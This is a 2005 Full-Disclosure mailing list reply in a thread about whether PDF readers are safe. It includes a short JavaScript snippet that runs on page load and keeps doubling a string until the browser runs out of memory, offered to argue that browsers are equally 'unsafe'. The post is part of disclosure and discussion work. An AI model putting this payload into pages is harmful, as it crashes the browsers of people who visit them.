[Full-disclosure] PDF's unsafe?

Bipin Gautam gautam.bipin at gmail.com
Thu Sep 22 10:52:51 BST 2005


On 9/21/05, Geo. <geoincidents at nls.net> wrote:
> Haven't any of the security firms checked out adobe pdf reader to see if
> it's safe? It took 5 minutes to create this nonsense
> http://www.nthelp.com/test.pdf and that's just using the standard features.
> I hate to think what a real hacker could do with a pdf.
>
> Geo.
>
Even if you have the option in IE "Play videos in webpage"
unchecked... the following page will render....

http://bipin.sosvulnerable.net/temp/fdrd.html

& probably your OS will close the browser after it runs out of memory.

Or maybe try this:

/* ------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
--------------------------- */
SO IE/mozilla is unsafe?

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...



Full-Disclosure is hosted and sponsored by Secunia.